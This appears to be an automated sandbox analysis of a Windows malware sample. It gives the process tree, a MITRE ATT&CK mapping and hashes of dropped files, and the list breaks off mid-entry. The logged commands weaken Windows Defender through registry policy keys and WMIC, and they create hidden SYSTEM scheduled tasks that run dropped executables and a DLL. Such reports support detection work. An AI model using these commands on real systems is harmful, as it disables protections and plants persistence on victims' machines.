C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yfARWRprRqUFWeTGf" /SC once /ST 00:02:54 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\eudyWVr.exe\" aV /TwpPdidzV 385118 /S" /V1 /F2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "yfARWRprRqUFWeTGf"2⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\eudyWVr.exeC:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\eudyWVr.exe aV /TwpPdidzV 385118 /S1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "biPxHmULFllsbMgnpt"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\zgoZGMcaU\VIwuzw.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JHJXtPPPvDXVqpH" /V1 /F2⤵
- Creates scheduled task(s)
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3878055 /state1:0x41c64e6d1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
2Windows Service
2Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
Modify Registry
3Virtualization/Sandbox Evasion
2Impair Defenses
1Disable or Modify System Firewall
1Subvert Trust Controls
1Install Root Certificate
1Credential Access
Unsecured Credentials
5Credentials In Files
4Credentials in Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Config.Msi\e588645.rbsFilesize
898KB
MD5dd8e64d14da9d57eb6f6eeb69425bd7a
SHA1e15c0f8753e2b15c07b4b3cdeb54d743d1c1c711
SHA2569fe5624534838691339762fceaf353d520413a9e33ba1a684b1fe963902bd9bd
SHA512857310159a10102f4a5e6eac6d5407f0d4e21b73171e476676228abdfba75159f70b7b0281d8f432e99ef62992103e65baf7cf6b0470b44115461cc14e3c9d42
-
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpiFilesize
2.0MB
MD553933ab47aec58bb6f24c4d9ead75116
SHA104ff6a70a61593b7c45288307a758c0bdbc9f3a1
SHA25697e52bab3bd85fa2ebeb481a36c0d7ca1011c2cb28105a0b41ca2072802978e2
SHA51277a01feb54af50332940a619f1c949422088dfaa33ff8889869e5d1a3bb7774ee8f64eca63498d40073017efde4e41ab849e37127d88905b50d5502a446eff5d
-
C:\ProgramData\Are.docxFilesize
11KB
MD5a33e5b189842c5867f46566bdbf7a095
SHA1e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA2565abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
C:\ProgramData\mozglue.dllFilesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
C:\Users\Admin\1000017002\06feb1f97d.exeFilesize
2.3MB
MD5b01d7f06e2f7e336f12494ae8344f00f
SHA18a38b4ed1483dbad020d5964a272472eb9c83d1b
SHA256fb916f56f8610e2cb4b962141fa3bcf09975bed780b889948dc27270ded41613
SHA512b84c8465e2fd14ccb4c7a9c48a9b50b0d88a6b06400e87e0726ac68dbbbad26b285bcb1cafc66b1bbf309b26d801740133d35cd7c0079991f931430a6c5a26ee
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.datFilesize
40B
MD5772424160a740ab46f10d75ee3f72e87
SHA1ce1d08ca4145f6a14ce3727642af5a997f73d1e5
SHA25600ee43ab7fd127a5e0b86cb4db053f67544834eac165db5b54f4b1d406952b84
SHA512920600c6e67f96b735a40de5e0c4bc1c585f49dc7e92bb07295bc0fed6b1ec3814f5813690d169d574b7184a6cad67cbf97718c224b0cd95cf7df239ab536d88
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
336B
MD5c4c79b1b6abed74aaead0680c92f2859
SHA1335e42f79ec05520837a7b8cd3b6c5cf5081cabc
SHA2567507e649e4df54ec8bd66c6a2621352ad210102cceea4a08d727ed9b54916c38
SHA51285509961ba9a5d0f94c883760166c80cfd1b3970cf929bc58e430ae1ea1e63e852e1b7970a6fca49bc7e33ef6550da665281e9070840b61f44efc208c9a0caae
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
456B
MD57a5c12e1917ff4cd1d2378b2c235f218
SHA1d914e0ffd06cf74a75e734d82de3deb71f0a1719
SHA256b7387f64aa9819ec3329a9aa5a51cff4a27f5e5b088f28a1e7020478aec148bd
SHA51262f20a32fdd7b11fb3c3bb511f16514a4b5c008eebeaba723f9e63b410c33167cd00349e83b8cfce49bb68b00227eab84de4a2c7e1fc28ab03e3c66614713202
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.jsonFilesize
187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.jsonFilesize
136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.jsonFilesize
150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending ReportsFilesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
522B
MD5a87ea02afc1534953d099f9ca9aa098b
SHA1494b053c41bf2273b222b431deab948ce6e62bba
SHA2568de64ad79733bf8a84ee0b61b7fdad858d8c82dbe69ed678cfcd0f191e54d295
SHA512f544ef1e23995b6248d7ee8b4b75597f49b03e3babad64efde210ebe5288f7ac2de8a23ae9436018ce3eb89ee73750853394bac6fbb5becece5e32503ac17b7b
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
522B
MD55b40c87298b8ebf37ad455d633e5c49c
SHA189777f243b3fa9acda2889cdd42e1ba4391736f1
SHA256291c5a801dafd67e844f574e586a5785a765ab84a13dedc8bf8d8f7e08531003
SHA512c372504941b02d6e259d2c930ebba3c84354d8cabc2d93b0916a16aa22d3a5adbebec4a23035e64abe325b8b90bb5df5b37263720168c173c033bb934c724a12
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
8KB
MD55ffa76796cdf98dd279c05d56a7fec65
SHA10db4c611d8f7926fe4be8e15980d972b53b04323
SHA256a5ee047ba3a5cb7d0925be6c1af5b17f4ddba63268756b541fa461ec09bc9521
SHA5128794ca1eeed96207de4ca15bab657bd5cd6596f849203d5875fffaf51ae8e49009a649d3c00040415b77319c26da4c2bfd433aacd5b362091f50967d7bda8793
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
7KB
MD52243c35cab50d0d939ac09f01cbb34d7
SHA19645c158a0d06a9f4e329aa5894bbd3a9c2dbc57
SHA256aeacefe228a7267c21cde0c8b40904171df208cb0973d8c64f9360f0643c83ea
SHA5121bd9f075def36ea983a49064cbf2dbc7d0dd79a56415b7bf501d9d78052d97b71d3f9d507e7a77df7dd438a94cf609b536ffd7b9df56a2e52ae4d19ea8bc5b4e
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
12KB
MD58f8184a2bb2e0db638b1a9fd3de90581
SHA1dadc04c1917a0c8eca6a1f74e735eaca0ce4f1ab
SHA256b3a001bf1979630b54b1836247fc4a0922c9e28bffb4f8f5c7be098678cc3d3c
SHA5127801a96dda8a0a8c498813d843672b5cfc6101d4d4957058b6aae916f3a2023d7252fee781e91a8ed618b9066226a1f350526d5d1c6e2eb5ab20173943f785cc
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesFilesize
16KB
MD5e5cdc1ad532dbd1a633b6ead26b2c2f5
SHA1e5c3c29b5611044fc89276798be728eadf669444
SHA2567b23a47e03aeaae8758e5b93021e4b46cd6a3f586e90b9a04bfd1f6d9176af55
SHA51267026e0f7da5e88ad975bf90d125d30b81e825d1a25fd0d2ad0a4f1f0dd7e8c5b177c551c3ebe10c4930568c099fcd22c9c5f55b662afe47bbd9f7e5947af08a
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesFilesize
23KB
MD58e206bcc141fcb79da44bf4f793d9240
SHA1495d3871bdf4fcea3aecdf626528e817448b77d3
SHA256941e6968b938b75cae1df2263eb4889b123d81118c84eb07bdb6bfded9af3961
SHA5126ec72c31b471eed09f62e230f2a7b3c5d0cf08c55c0a8dec4576fbddfcd0e70f182f1d9943b2de820bea65d86e4a65bb7697a2744b16e502632f656e3469d0f1
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local StateFilesize
131KB
MD5bfb0d987639a158011c4abb8cbae403e
SHA126fecaa04486b0f099ccba1ce2267c994c17fe25
SHA2563c7ba467cdc0abcb30a720fcb8ecd1446859f30f38c20d3251a33e787a38b154
SHA512f771114c973cf4e708b553064ea756cc25e54fb38063bc1029df5cbc41964d32d01e4df39c6c3628104c0994a306df17877c5b5008500060d8e0d37febe2667a
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local StateFilesize
258KB
MD508570ee8cb9f9206bc596984fbd4a9ca
SHA1d099da96778cfdf1f854475670f1b73db073e7bb
SHA2565aef1eaefa5b3ed7a04010b3529a1cc65a3ed983dbb83547eb82e91d61677ddc
SHA5125950ab65d6939315d155b557e0e34e41a1f900f41dd04b980cebf68ed880fac5ff9510bd923d657910faa3e156393437919f25b7596c661f26c68eefe06d6a22
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local StateFilesize
134KB
MD534c1c1b59f20f6a44678e3f4d579525b
SHA1c790210668799e0565d3bb03214e37b3b56801b1
SHA256f18d700f499dcffa642b6d2a3cb7954c1332bfd2c437d2e6079e0aabf66c8a18
SHA512f110e59ccc9a9d4e9f7741b957431082bd8a37339698812002e51760bd7f9c67bd5ee0f869e2c218a8bafe898c2728518129e031d59cafc9886fa0c0f549bb48
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local StateFilesize
134KB
MD5fced9dcf1a0d3fafb8d279f4594be4c4
SHA1f65ce71d0cd7d64d834edb460d0b836233116c03
SHA256a19e39a192c16274bd1293a704a4a7a73d58ac069d3593362a2a980af1bf7dc5
SHA512645bf2b57ca4d430bee9320c3585fd925edf5c37c9dc0cc5616a10e507b33e81086f6f766438d861a54da966d2fa75cd85b72ffde57573e0fb7587ab04fad172
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info CacheFilesize
98KB
MD5d745f02ce2a7ab5ae13251c830797c48
SHA1fa7f54fa643d17a5efe15a8941dd82e1942f7307
SHA256471cd81fb588dd397ed4e9c27cd48050059f10a68d25d4d3ab75c5c3208af810
SHA5121fdd5ca314c8edab19472b9ddafb6720ccbf47b5b482995f9cb3cf18a5a69d5dc3f1c61691a2296be2cd199daf2a7c518acb1363119d12f09f0176021f8dd405
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info CacheFilesize
100KB
MD55f6006b8467d0bb4e84f8f41ffa02b7b
SHA17ade4d6516d59aa2ac646fada358520e2b4f0ef2
SHA256e1d6d274d9f99cb92358ae426f0b513403e501243b542742074d21c1306f437d
SHA512c5d7781b9c79a7faadaad243ad67e9b220d42fb400889b2228a22626fd3cd29a0e37a19d256a76847183a56f085fa0491f95a90634cc64cef098828b56119c2c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe580d88.TMPFilesize
94KB
MD50fee0276a312dd610ac2c0f43e3115e3
SHA1ad3db5d8aa89051d5acd088e0ef3c165b9dd64fa
SHA256cc110aa9cd8a9470a7df85e22695e7fa2c37cb1caaa4f654be0ed5b2573eb826
SHA5128e33f905d395dda46c542108e6876c4af68640b373d69cc491287dfd6d723858962f19075f93dd7b29dd11e06097e915c7419a8fae507ec6156194ad46dee638
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.jsonFilesize
151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
11KB
MD5176d6c81365ef5d01d6ce866af0313f5
SHA1f239908bc356d85d24701b913190e071d6aa58ac
SHA25664b17c35d73b05ff2dcca7297d077fe0a5c4eae2c83b408ab606084ac91e269b
SHA5125d5c3612a8da0ffd5c5476ac14de32fe50fd6809e84c55cad29e0551440f0c7f25b5de1cd7867bd0f7f3019a3c9fdd4b6c46b5bec4d3a0f8b230a2c25bbe9bb1
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
19KB
MD573ca96669cf5ee2fd83256498cfa3062
SHA112cc2fdc17b8d07f7996f2b842b70d105b227a65
SHA256a0ebe050a8f790c980ab294b27776d1f2ed4bfc33a727ed235e2a93d8cba0d31
SHA51217364cafae9e941474df6e27024486d8755091a8aa9daa6affe6a90a5a9c8cd8b5c7e42fd12f2569358a0536277cf9cf4118102abda3027a4284b22c78690634
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD554522d22658e4f8f87ecb947b71b8feb
SHA16a6144bdf9c445099f52211b6122a2ecf72b77e9
SHA256af18fc4864bc2982879aed928c960b6266f372c928f8c9632c5a4eecd64e448a
SHA51255f2c5a455be20dcb4cb93a29e5389e0422237bdd7ac40112fec6f16a36e5e19df50d25d39a6d5acb2d41a96514c7ecd8631ce8e67c4ff04997282f49d947aba
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280542131\additional_file0.tmpFilesize
2.5MB
MD515d8c8f36cef095a67d156969ecdb896
SHA1a1435deb5866cd341c09e56b65cdda33620fcc95
SHA2561521c69f478e9ced2f64b8714b9e19724e747cd8166e0f7ab5db1151a523dda8
SHA512d6f48180d4dcb5ba83a9c0166870ac00ea67b615e749edf5994bc50277bf97ca87f582ac6f374c5351df252db73ee1231c943b53432dbb7563e12bbaf5bb393a
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280542131\opera_packageFilesize
103.9MB
MD5b7e7c07657383452919ee39c5b975ae8
SHA12a6463ac1eb8be1825b123b12f75c86b7fff6591
SHA2561d3f55e541be41e98341cb1d7b5d10487f886093370bdccdb26c70c322246bb9
SHA512daeabc9a4d76e1107681e96b1371682fa6dd589001f8b03fe41165d5c32a96179daeac359f86772c9768fdbdee271c16f92ad0dbd10b2fc7cde3970f0c92aa39
-
C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exeFilesize
1.8MB
MD5d0593c9c56d1f897206d9e748570a458
SHA17d9311edff37e0a3ff87b4a6f29ff132455cb86e
SHA256ea58b781b3e142012c522bc21df755b13f267eb652a8f0a2cfb21c4739e666b6
SHA512caec9aaa4467af46efc31b86e0a6acb2edc08e3ea64fc286cdc02d84fd804160d4fd01d383c900238e93e66900185e75ca495735d6054a5e7a693ecb62004309
-
C:\Users\Admin\AppData\Local\Temp\1000016001\d89781e451.exeFilesize
1.1MB
MD57e2b4eb527b1cf2edc34f7a38a13f374
SHA13903a5f06782cd23ccfc7f97a5fee37fb3ff0f5f
SHA2565f8adf2cb9f19baf9bbe077a62ab330efa45c347373043f00a7c3152fea8f6d6
SHA512aca767ef101a19a82e6c974751f6410e10e0f038988029b3dcf45b32afaf4090b529de39650451bdb0471e70cf013912abe347731e72263e16bbf1c6a5967ece
-
C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exeFilesize
381KB
MD5cb1fa9b5d0509372c8299742a9a36228
SHA1bb8e5a0206f8909afbf5b32a1493e686e596c040
SHA256d09f47363c21f002a615eb6476973cf907eb9c4ab16b1f9aa3909e200665ac45
SHA51261c74cab5d8928b9cfb53ddc8ba4b0528ba6cddf72b8ae7a866a5c77f27079d3cc2752ab0d533635701c94e2de49c92d600a1d74f734268d535cb53750696826
-
C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exeFilesize
50KB
MD517eefbaaa30123fa3091add80026aed4
SHA18e43d736ea03bd33de5434bda5e20aae121cd218
SHA256b780f8659c3cfab33ffa95b25b396b2b8ade8bd40c72aaf7c87ad3c6b6cf34c5
SHA512e82fbbbfef61773fae1ed3e0767efa225ede0327ca5654de25e86359f4366942f85cf5542e67a52b24bb129d7fccf09fc68c64a73cf9269a75040d888005fa09
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeFilesize
1.8MB
MD58ee151e8a6df267efc06d71ed339030e
SHA11a0bef02ecc1a20552d9b8bd3490ae73f3c40f8c
SHA256fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086
SHA512b31e95334ee5bc0a1269d4b264ad5717cee5b45869c9b5221a3133e761cc77f480c5d89fcf1cdfcdb3858e4840c6152252f80982cce93c0a494a3dbba578799a
-
C:\Users\Admin\AppData\Local\Temp\7zS7ABE.tmp\Install.exeFilesize
6.4MB
MD590487eb500021dbcb9443a2cf972a204
SHA162ae31665d462c8e5d6632f389b1e94afb9bf00d
SHA2564a86ca84b985a5228eccd13f225bb403e9574e7f64b900a9acc4d32bcb732ff2
SHA5128cb3b1ae44246bee8bf2b81220d7a5782c4e82b2b871a81bdc9ea170fbe477d7be59c3543554f2cdefde7422bcc88b6624b966dff1603c79d277329fb2074d17
-
C:\Users\Admin\AppData\Local\Temp\7zS8CF9.tmp\AuthHost.exeFilesize
154KB
MD514f675f8506da96c2f1c47c7be5abdaa
SHA134f4929d325f4ed7b7d3d318f6b6142f8a5013ae
SHA2566778d42a25b4ab28fa157d9b9eb63dc826c8a6faac650ecb5e33b13954f88db1
SHA512d1f3e24a3f1440421de4b5daf2880e74187ce96aa53eae466b49edcedd2e2d988c2e51c1aeebf6e162ced41b4d727e97f654ded6e71a79363665ea033c2c38f0
-
C:\Users\Admin\AppData\Local\Temp\7zS8CF9.tmp\Info.xmlFilesize
3KB
MD50456be6047774e5d0b8045b787048924
SHA176f6445368a4462a50e502bc272a8efc2eb33cb0
SHA2561c4440a8312e16bc682277164cc6710b37fc3dcac5ef9aa0ba7e77fc0c1f4897
SHA512c0f0cf97e0fd0b258b9a9fa6466dd9e390cd79f3edb0f5b9f10137c241c6b079061135c44c0c30dc71c28f1b7b929c65eb1112761e53cd8400d7e07ce1a7b99c
-
C:\Users\Admin\AppData\Local\Temp\7zS8CF9.tmp\attrib.exeFilesize
40KB
MD5a243bc9db0bfb5f22e146b88bb10c58f
SHA1a5ff3845b0f55157c4aea35e9eae213560acdb5c
SHA2560758152947f1a550e52ce8e3f9bcd988a23d36a458ad953795769b11c38ff2ea
SHA51258c668e9ab61f3af13e1a5a52930b5c6e281d7d85d1180ca82ccca4268b3d3a93a25e8ed7a1c2d126e88eaf7d3ad38cd051974c9b200c13b5a4584e221ee8161
-
C:\Users\Admin\AppData\Local\Temp\7zS8CF9.tmp\bootsect.exeFilesize
105KB
MD568c39a577225aeb6b28ea3558e683c19
SHA10504785549d7a3ac936c425b14253f779e580bc3
SHA2566a4e0396657ace212c955b4c95ddc357be66c2c9968dcd7a909bf4cc32f59841
